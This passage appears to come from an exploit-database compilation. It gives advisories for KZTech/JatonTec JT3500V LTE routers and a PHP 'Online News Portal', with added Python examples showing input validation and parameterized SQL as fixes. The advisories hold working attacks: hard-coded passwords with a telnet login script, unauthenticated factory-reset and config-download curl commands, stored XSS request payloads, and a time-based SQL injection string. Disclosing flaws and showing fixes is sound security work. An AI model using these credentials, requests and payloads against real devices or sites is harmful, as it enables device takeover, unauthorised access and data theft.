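Added example, not the device's firmware. The advisory shows "$(uname)" passing
the device's filter in 'pingAddr'; this replaces filtering with validation of
the expected shape and removes the shell from the execution path. Parameter
names follow the advisory; option ranges and ping flags are assumed.
"""
import ipaddress
import re
import subprocess

# One RFC 1123 hostname label: alphanumerics and hyphens, no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_ping_target(value: str) -> bool:
    """Accept a literal IPv4/IPv6 address or a syntactically valid hostname, nothing else.

    A blocklist that strips ';' or '|' leaves "$(uname)" intact; requiring the input
    to have the shape of a hostname rejects it, because '$', '(' and ')' are not
    hostname characters. A leading hyphen is rejected too, so the value can never
    be mistaken for a ping option.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def build_ping_argv(ping_addr: str, ping_count: int = 1, packet_size: int = 32,
                    ping_timeout: int = 7) -> list:
    """Build the argv list for ping.

    The target is passed as its own argument rather than interpolated into a
    command string, so even an unvalidated value would reach ping as data; the
    validation on top keeps malformed input out of the logs and the process.
    """
    if not is_valid_ping_target(ping_addr):
        raise ValueError("pingAddr is not a host name or IP address")
    if not (1 <= ping_count <= 10 and 0 <= packet_size <= 65500 and 1 <= ping_timeout <= 60):
        raise ValueError("ping option out of range")
    return ["ping", "-c", str(ping_count), "-s", str(packet_size),
            "-W", str(ping_timeout), ping_addr]


def run_ping(ping_addr: str, **options) -> str:
    """Run ping with shell=False; needs a ping binary, so it is not exercised offline."""
    argv = build_ping_argv(ping_addr, **options)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=70)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    # Constructed inputs: two legitimate targets, the advisory's payload, an option-like value.
    for candidate in ("192.168.1.1", "example.com", "$(uname)", "-n"):
        print(f"{candidate!r:14} valid={is_valid_ping_target(candidate)}")
```

The argv form alone removes the injection, because subprocess hands the target to ping as a single argument; the allowlist is what turns a malformed request into a clean 4xx instead of a ping error, and what blocks option injection through a leading hyphen.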
-
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/
Affected version: Model    | Firmware
                  ---------|-----------
                  JT3500V  | 2.0.1B1064
                  JT3300V  | 2.0.1B1047
                  AM6200M  | 2.0.0B3210
                  AM6000N  | 2.0.0B3042
                  AM5000W  | 2.0.0B3037
                  AM4200M  | 2.0.0B2996
                  AM4100V  | 2.0.0B2988
                  AM3500MW | 2.0.0B1092
                  AM3410V  | 2.0.0B1085
                  AM3300V  | 2.0.0B1060
                  AM3100E  | 2.0.0B981
                  AM3100V  | 2.0.0B946
                  AM3000M  | 2.0.0B21
                  KZ7621U  | 2.0.0B14
                  KZ3220M  | 2.0.0B04
                  KZ3120R  | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE
product specially designed to enable quick and easy LTE fixed data service
deployment for residential and SOHO customers. It provides high speed LAN,
Wi-Fi and VoIP integrated services to end users who need both bandwidth and
multi-media data service in residential homes or enterprises. The device has
2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall
software for security. It provides an effective all-in-one solution to SOHO or
residential customers. It can deliver up to 1Gbps max data throughput which
can be very competitive to wired broadband access service.

Desc: The device utilizes hard-coded credentials within its Linux distribution
image. These sets of credentials are never exposed to the end-user and cannot
be changed through any normal operation of the router.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5637
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php

03.02.2021

--

Default web creds:
------------------
admin:admin123
user:user123

Telnet/SSH access:
------------------
admin:root123

===

import telnetlib

host="192.168.1.1"
user="admin"
password="root123"

s=telnetlib.Telnet(host)
s.read_until(b"CPE login: ")
s.write(user.encode('ascii') + b"\n")
s.read_until(b"Password: ")
s.write(password.encode('ascii') + b"\n")
s.write(b"busybox\n")
print(s.read_all().decode('ascii'))
s.mt_interact()
s.close()
-
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/
Affected version: Model    | Firmware
                  ---------|-----------
                  JT3500V  | 2.0.1B1064
                  JT3300V  | 2.0.1B1047
                  AM6200M  | 2.0.0B3210
                  AM6000N  | 2.0.0B3042
                  AM5000W  | 2.0.0B3037
                  AM4200M  | 2.0.0B2996
                  AM4100V  | 2.0.0B2988
                  AM3500MW | 2.0.0B1092
                  AM3410V  | 2.0.0B1085
                  AM3300V  | 2.0.0B1060
                  AM3100E  | 2.0.0B981
                  AM3100V  | 2.0.0B946
                  AM3000M  | 2.0.0B21
                  KZ7621U  | 2.0.0B14
                  KZ3220M  | 2.0.0B04
                  KZ3120R  | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE
product specially designed to enable quick and easy LTE fixed data service
deployment for residential and SOHO customers. It provides high speed LAN,
Wi-Fi and VoIP integrated services to end users who need both bandwidth and
multi-media data service in residential homes or enterprises. The device has
2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall
software for security. It provides an effective all-in-one solution to SOHO or
residential customers. It can deliver up to 1Gbps max data throughput which
can be very competitive to wired broadband access service.

Desc: The device allows unauthenticated attackers to visit the unprotected
/goform/LoadDefaultSettings endpoint and reset the device to its factory
default settings. Once the GET request is made, the device will reboot with
its default settings allowing the attacker to bypass authentication and take
full control of the system.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5642
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php

03.02.2021

--

$ curl -sk https://192.168.1.1/goform/LoadDefaultSettings
success
$
-
Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting
# Exploit Title: Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Multiple endpoints on the application suffer from Stored XSS injection as a user/supplier and admin. Scripts execute on page load.

# One

POST /pos_inv/admin/addcustomer.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------26863080316712198253766739741
Content-Length: 661
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/customer.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1

-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="name"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="address"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="contact"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="username"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="password"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741--

# Two

http://127.0.0.1/pos_inv/admin/supplier.php

POST /pos_inv/admin/edit_supplier.php?id=4 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/supplier.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1

name=Dell+Computer+Corporation&address=%3Cscript%3Ealert%28%60Stored+XSS%60%29%3C%2Fscript%3E&contact=1-800-WWW-DELL&username=supplier&password=fa3ddb86f38fb6a8284636249f6551aa

# Three

http://127.0.0.1/pos_inv/admin/product.php

POST /pos_inv/admin/edit_product.php?id=12 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11435260685310908573266876009
Content-Length: 844
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/product.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1

-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="name"

ACER Aspire GX-781 Gaming PC <script>alert(1)</script>
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="category"

2
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="supplier"

0
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="price"

749.99
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="qty"

1000
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------11435260685310908573266876009--
-
Online News Portal 1.0 - 'name' SQL Injection
# Exploit Title: Online News Portal 1.0 - 'name' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Steps
# Add a new product: http://127.0.0.1/pos_inv/supplier/addproduct.php
# Save request in BurpSuite
# Run saved request with sqlmap -r sql.txt

---
Parameter: MULTIPART name ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="name"

aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="category"

1
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="price"

asd
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="qty"

asd
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------15280280330873390203691218429--
---
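As an added example (not the application's PHP), the product insert written two ways in Python against an in-memory SQLite database and fed the sqlmap payload quoted above. Built by string concatenation, the payload reaches the SQL parser (SQLite reports the unknown SLEEP function where MySQL would pause for five seconds, which is exactly the signal sqlmap measured); with placeholders, the same string is stored as ordinary data. The product table layout is assumed from the form fields in the request.

```python
"""String-built SQL beside a parameterized query, exercised with the advisory's payload.

Added example, not the application's code. The table layout is assumed from
the form fields (name, price, qty); SQLite stands in for MySQL, so the
time-based payload raises an error instead of sleeping, which still proves
the attacker's SQL was parsed.
"""
import sqlite3

# Constructed: the sqlmap payload quoted in the advisory, as it arrives in the 'name' field.
PAYLOAD = "aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, price TEXT, qty TEXT)")
    return conn


def add_product_vulnerable(conn: sqlite3.Connection, name: str, price: str, qty: str) -> None:
    """The pattern behind the finding: request data concatenated into the statement text."""
    sql = f"INSERT INTO product (name, price, qty) VALUES ('{name}', '{price}', '{qty}')"
    conn.execute(sql)


def add_product_safe(conn: sqlite3.Connection, name: str, price: str, qty: str) -> None:
    """Placeholders: the driver sends values separately from the statement, so a quote
    inside the value can never terminate the string literal."""
    conn.execute("INSERT INTO product (name, price, qty) VALUES (?, ?, ?)", (name, price, qty))


def demo():
    """Return (outcome of the vulnerable insert, name stored by the safe insert)."""
    conn = fresh_db()
    try:
        add_product_vulnerable(conn, PAYLOAD, "asd", "asd")
        vulnerable_outcome = "executed"
    except sqlite3.OperationalError as exc:
        # SQLite has no SLEEP(); the error proves the payload was parsed as SQL.
        vulnerable_outcome = str(exc)
    add_product_safe(conn, PAYLOAD, "asd", "asd")
    stored = conn.execute("SELECT name FROM product").fetchone()[0]
    conn.close()
    return vulnerable_outcome, stored


if __name__ == "__main__":
    outcome, stored = demo()
    print("vulnerable insert:", outcome)
    print("safe insert stored:", stored)
```

Under MySQL the vulnerable insert would succeed after a five-second pause, which is the behaviour sqlmap's time-based technique keys on; the safe insert behaves identically on both engines and is the fix for every endpoint that builds SQL from the multipart fields.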
-
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/
Affected version: Model    | Firmware
                  ---------|-----------
                  JT3500V  | 2.0.1B1064
                  JT3300V  | 2.0.1B1047
                  AM6200M  | 2.0.0B3210
                  AM6000N  | 2.0.0B3042
                  AM5000W  | 2.0.0B3037
                  AM4200M  | 2.0.0B2996
                  AM4100V  | 2.0.0B2988
                  AM3500MW | 2.0.0B1092
                  AM3410V  | 2.0.0B1085
                  AM3300V  | 2.0.0B1060
                  AM3100E  | 2.0.0B981
                  AM3100V  | 2.0.0B946
                  AM3000M  | 2.0.0B21
                  KZ7621U  | 2.0.0B14
                  KZ3220M  | 2.0.0B04
                  KZ3120R  | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE
product specially designed to enable quick and easy LTE fixed data service
deployment for residential and SOHO customers. It provides high speed LAN,
Wi-Fi and VoIP integrated services to end users who need both bandwidth and
multi-media data service in residential homes or enterprises. The device has
2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall
software for security. It provides an effective all-in-one solution to SOHO or
residential customers. It can deliver up to 1Gbps max data throughput which
can be very competitive to wired broadband access service.

Desc: JT3500V is vulnerable to unauthenticated configuration disclosure when
direct object reference is made to the export_settings.cgi file using an HTTP
GET request. This will enable the attacker to disclose sensitive information
and help her in authentication bypass, privilege escalation and full system
access.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5644
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php

03.02.2021

--

$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat
8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb  4 11:31 config.dat